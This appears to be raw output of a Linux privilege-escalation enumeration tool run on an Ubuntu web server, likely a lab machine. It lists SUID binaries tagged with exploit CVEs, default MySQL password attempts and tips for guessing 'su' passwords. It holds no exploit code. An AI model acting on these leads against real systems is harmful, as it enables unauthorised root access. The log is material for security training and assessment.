uid=114(mysql) gid=118(mysql) groups=118(mysql)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)

╔══════════╣ Login now
 20:46:04 up 46 min,  0 users,  load average: 0.54, 0.28, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
ubuntu   pts/2        Mon Jan 20 05:52:13 2025 - Mon Jan 20 09:01:44 2025  (03:09)     192.168.230.1
ubuntu   pts/1        Mon Jan 20 04:44:57 2025 - Mon Jan 20 09:01:44 2025  (04:16)     192.168.230.1
ubuntu   pts/0        Mon Jan 20 03:35:42 2025 - Tue Jan 21 02:51:57 2025  (23:16)     192.168.230.1
ubuntu   tty1         Mon Jan 20 03:34:48 2025 - down                     (1+02:31)    0.0.0.0
reboot   system boot  Mon Jan 20 03:34:03 2025 - Tue Jan 21 06:06:22 2025 (1+02:32)    0.0.0.0
ubuntu   tty1         Mon Jan 20 03:26:15 2025 - down                      (00:03)     0.0.0.0
reboot   system boot  Mon Jan 20 03:25:45 2025 - Mon Jan 20 03:29:15 2025  (00:03)     0.0.0.0
reboot   system boot  Mon Jan 20 03:14:10 2025 - Mon Jan 20 03:29:15 2025  (00:15)     0.0.0.0

wtmp begins Mon Jan 20 03:14:10 2025

╔══════════╣ Last time logon each user
Username         Port     From             Latest
ubuntu           tty1                      Wed Mar 18 13:45:32 +0000 2026

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/local/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  g++                                   4:9.3.0-1ubuntu2                  amd64        GNU C++ compiler
ii  g++-9                                 9.4.0-1ubuntu1~20.04.2            amd64        GNU C++ compiler
ii  gcc                                   4:9.3.0-1ubuntu2                  amd64        GNU C compiler
ii  gcc-9                                 9.4.0-1ubuntu1~20.04.2            amd64        GNU C compiler
/usr/bin/gcc

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.41 (Ubuntu)
Server built:   2024-07-17T18:58:09
httpd Not Found

Nginx version: nginx Not Found

/etc/apache2/apache2.conf-
/etc/apache2/apache2.conf:AddType application/x-httpd-php .php
--
/etc/apache2/apache2.conf-
/etc/apache2/apache2.conf:#SetHandler application/x-httpd-php
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jan 20  2025 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Jan 20  2025 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Jan 20  2025 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html/public
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>


-rw-r--r-- 1 root root 1339 Jan 21  2025 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html/public
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Jan 20  2025 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html/public
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

-rw-r--r-- 1 root root 512 Jan 21  2025 /usr/local/lib/php.ini



╔══════════╣ Analyzing MariaDB Files (limit 70)

-rw------- 1 root root 317 Jan 20  2025 /etc/mysql/debian.cnf

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Nov 11  2022 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
        comment = public archive
        path = /var/www/pub
        use chroot = yes
        lock file = /var/lock/rsyncd
        read only = yes
        list = yes
        uid = nobody
        gid = nogroup
        strict modes = yes
        ignore errors = no
        ignore nonreadable = yes
        transfer logging = no
        timeout = 600
        refuse options = checksum dry-run
        dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jan 20  2025 /etc/pam.d
-rw-r--r-- 1 root root 2133 Jan  2  2024 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jan 20  2025 /etc/ldap



╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3787 May 19  2023 /etc/cloud/cloud.cfg
     lock_passwd: True
-rw-r--r-- 1 root root 3786 Dec  8  2022 /snap/core20/1828/etc/cloud/cloud.cfg
     lock_passwd: True
-rw-r--r-- 1 root root 3766 Jul 11  2024 /snap/core20/2434/etc/cloud/cloud.cfg
    lock_passwd: True

╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 200 Feb  7  2023 /snap/core20/1828/usr/share/keyrings
drwxr-xr-x 2 root root 200 Sep 11  2024 /snap/core20/2434/usr/share/keyrings
drwxr-xr-x 2 root root 4096 Mar 14  2023 /usr/share/keyrings




╔══════════╣ Analyzing Backup Manager Files (limit 70)

-rw-rw-r-- 1 www-data www-data 1962 Dec 10  2018 /var/www/html/application/database.php
    'database'        => '',
    'password'        => '',

╔══════════╣ Analyzing Cache Vi Files (limit 70)


╔══════════╣ Analyzing SNMP Files (limit 70)

╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 813 Feb  2  2020 /snap/core20/1828/usr/share/bash-completion/completions/postfix

-rw-r--r-- 1 root root 813 Feb  2  2020 /snap/core20/2434/usr/share/bash-completion/completions/postfix

-rw-r--r-- 1 root root 813 Feb  2  2020 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind




╔══════════╣ Analyzing Jenkins Files (limit 70)





╔══════════╣ Analyzing Interesting logs Files (limit 70)


╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25  2020 /etc/skel/.bashrc
-rw-r--r-- 1 ubuntu ubuntu 3771 Feb 25  2020 /home/ubuntu/.bashrc
-rw-r--r-- 1 root root 3771 Feb 25  2020 /snap/core20/1828/etc/skel/.bashrc
-rw-r--r-- 1 root root 3771 Feb 25  2020 /snap/core20/2434/etc/skel/.bashrc





-rw-r--r-- 1 root root 807 Feb 25  2020 /etc/skel/.profile
-rw-r--r-- 1 ubuntu ubuntu 807 Feb 25  2020 /home/ubuntu/.profile
-rw-r--r-- 1 root root 807 Feb 25  2020 /snap/core20/1828/etc/skel/.profile
-rw-r--r-- 1 root root 807 Feb 25  2020 /snap/core20/2434/etc/skel/.profile



-rw-r--r-- 1 ubuntu ubuntu 0 Jan 20  2025 /home/ubuntu/.sudo_as_admin_successful

╔══════════╣ Analyzing Windows Files (limit 70)






















lrwxrwxrwx 1 root root 20 Jan 20  2025 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf
lrwxrwxrwx 1 root root 24 Jan 20  2025 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 81 Jan 20  2025 /var/lib/dpkg/alternatives/my.cnf






























╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user              = mysql
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/

╔══════════╣ MySQL version
mysql  Ver 8.0.40-0ubuntu0.20.04.1 for Linux on x86_64 ((Ubuntu))


═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 2796 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /snap/core20/1828/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /snap/core20/1828/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /snap/core20/1828/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /snap/core20/1828/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /snap/core20/1828/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /snap/core20/2434/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /snap/core20/2434/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /snap/core20/2434/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /snap/core20/2434/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /snap/core20/2434/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 3267 Jul  4  2022 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2247 Feb 28  2023 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg
-rw-r--r-- 1 root root 2274 Feb 28  2023 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 Feb 28  2023 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Feb 28  2023 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Feb 28  2023 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 2250 Feb 28  2023 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg
-rw-r--r-- 1 root root 2235 Feb 28  2023 /usr/share/keyrings/ubuntu-advantage-ros.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13  2020 /usr/share/popularity-contest/debian-popcon.gpg
-rw-r--r-- 1 root root 833 Mar 14  2023 /var/lib/apt/lists/_cdrom_dists_focal_Release.gpg
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEEhDk43yKNIvezdCvA2Uqj8O/iEJIFAmQQ/OYACgkQ2Uqj8O/i
EJLTPw//Tkq8XFUMp1LHo5wOzr8BmRuea9V+3/Ieedy1HFBnO8wfFaEA7HnOErKf
k0CPCOw7YyZXZxUsRaJhNhFWGeFAFvT8tU44+pAYTpPeG3z54IXvYUeqNNHN1OIV
rdxsXBl2LL+bw628z59R+hEq5a/F4bfsBqktJGoVvACG8+d6l4/ODJtVl2GAdY+m
dgNj+qcqHrLdQd1xAi2S9LpYkksN+D1So0Pm0uM/j52gRCQfCgkAJ3voz37tZdve
H0KsHOI4luyZjoWoXhSw7rE6uHnTHSYriql5ONdQSyo41yGVZncbroz71UybCjKp
qBzJmuVc5DAMbHPnAxEVq0YqSqFjyTN278MDYcLNH9mTju66U0BGpGaQKstC4QmY
azsD13ddX2hQcqLCHlWXlZ7wxr0vReuSGOEqlw3S7Y1JvEwXpTgK0y4HSE6qzU89
1oXqPJWBGmmenX/iEy4lVHRfTBXHSXJUGakbL8mDTXZSbBMFXTl+afwOhSTIjq+t
9yntbANiiUidNGq22skUZXRq/1O2aOL9LcjA5D5eVeYqAsaCr5Absr5WrjPx/7O9
xq/6jHxV0hwiGUJLqO1uqeCgXhIEO3cT2nJmbjRy28hupXXj+NxS0+1Ea6p5xY7+
iCQTaDQ6+fJkEoB1njMScbyvZBX8yRT9g51PX9IIRz6GNxk824o=
=pU+K
-----END PGP SIGNATURE-----
-rw-r--r-- 1 root root 2236 Jan 20  2025 /var/lib/ubuntu-advantage/apt-esm/etc/apt/trusted.gpg.d/ubuntu-advantage-esm-apps.gpg


╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /snap/core20/1828/etc/pam.d/passwd
passwd file: /snap/core20/1828/etc/passwd
passwd file: /snap/core20/1828/usr/share/bash-completion/completions/passwd
passwd file: /snap/core20/1828/usr/share/lintian/overrides/passwd
passwd file: /snap/core20/1828/var/lib/extrausers/passwd
passwd file: /snap/core20/2434/etc/pam.d/passwd
passwd file: /snap/core20/2434/etc/passwd
passwd file: /snap/core20/2434/usr/share/bash-completion/completions/passwd
passwd file: /snap/core20/2434/usr/share/lintian/overrides/passwd
passwd file: /snap/core20/2434/var/lib/extrausers/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)





-rw-r--r-- 1 root root 603 Jan 20  2025 /etc/ssh/ssh_host_dsa_key.pub
-rw-r--r-- 1 root root 175 Jan 20  2025 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 95 Jan 20  2025 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 567 Jan 20  2025 /etc/ssh/ssh_host_rsa_key.pub

ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.pem
/etc/ssl/certs/ANF_Secure_Server_Root_CA.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Atos_TrustedRoot_Root_CA_ECC_TLS_2021.pem
/etc/ssl/certs/Atos_TrustedRoot_Root_CA_RSA_TLS_2021.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
6458PSTORAGE_CERTSBIN

══╣ Some client certificates were found:
/root/php/php-7.4.33/ext/openssl/tests/bug74022.pfx
/root/php/php-7.4.33/ext/openssl/tests/p12_with_extra_certs.p12

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
tmux 3.0a


/tmp/tmux-33



                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 467K Jan  2  2024 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 51K Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 152K Jul 26  2024 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 67K Apr  9  2024 /usr/bin/su
-rwsr-xr-x 1 root root 39K Apr  9  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 87K Feb  6  2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 313K Feb 18  2020 /usr/bin/find
-rwsr-xr-x 1 root root 163K Apr  4  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 55K Apr  9  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Feb  6  2024 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb  6  2024 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 31K Feb 21  2022 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034
-rwsr-xr-x 1 root root 52K Feb  6  2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 84K Feb  6  2024 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 84K Nov 29  2022 /snap/core20/1828/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Nov 29  2022 /snap/core20/1828/usr/bin/chsh
-rwsr-xr-x 1 root root 87K Nov 29  2022 /snap/core20/1828/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Feb  7  2022 /snap/core20/1828/usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Nov 29  2022 /snap/core20/1828/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 67K Nov 29  2022 /snap/core20/1828/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Feb  7  2022 /snap/core20/1828/usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 16  2023 /snap/core20/1828/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 39K Feb  7  2022 /snap/core20/1828/usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-- 1 root systemd-resolve 51K Oct 25  2022 /snap/core20/1828/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Mar 30  2022 /snap/core20/1828/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 84K Feb  6  2024 /snap/core20/2434/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Feb  6  2024 /snap/core20/2434/usr/bin/chsh
-rwsr-xr-x 1 root root 87K Feb  6  2024 /snap/core20/2434/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Apr  9  2024 /snap/core20/2434/usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Feb  6  2024 /snap/core20/2434/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb  6  2024 /snap/core20/2434/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Apr  9  2024 /snap/core20/2434/usr/bin/su
-rwsr-xr-x 1 root root 163K Apr  4  2023 /snap/core20/2434/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 39K Apr  9  2024 /snap/core20/2434/usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-- 1 root systemd-resolve 51K Oct 25  2022 /snap/core20/2434/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 467K Jan  2  2024 /snap/core20/2434/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 177K Dec  4  2024 /snap/snapd/23545/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 121K Jan 25  2023 /snap/snapd/18357/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 83K Feb  6  2024 /usr/bin/chage
-rwxr-sr-x 1 root ssh 343K Jan  2  2024 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K Feb  6  2024 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root shadow 43K Jan 10  2024 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Jan 10  2024 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 83K Nov 29  2022 /snap/core20/1828/usr/bin/chage
-rwxr-sr-x 1 root shadow 31K Nov 29  2022 /snap/core20/1828/usr/bin/expiry
-rwxr-sr-x 1 root crontab 343K Mar 30  2022 /snap/core20/1828/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Feb  7  2022 /snap/core20/1828/usr/bin/wall
-rwxr-sr-x 1 root shadow 43K Feb  2  2023 /snap/core20/1828/usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Feb  2  2023 /snap/core20/1828/usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 83K Feb  6  2024 /snap/core20/2434/usr/bin/chage
-rwxr-sr-x 1 root shadow 31K Feb  6  2024 /snap/core20/2434/usr/bin/expiry
-rwxr-sr-x 1 root crontab 343K Jan  2  2024 /snap/core20/2434/usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 43K Jan 10  2024 /snap/core20/2434/usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Jan 10  2024 /snap/core20/2434/usr/sbin/unix_chkpwd

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=

╚ Parent process capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=


Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/snap/core20/1828/usr/bin/ping = cap_net_raw+ep
/snap/core20/2434/usr/bin/ping = cap_net_raw+ep

╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
  - /usr/lib/x86_64-linux-gnu/libfakeroot
  /etc/ld.so.conf.d/libc.conf
  - /usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /usr/local/lib/x86_64-linux-gnu
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 44
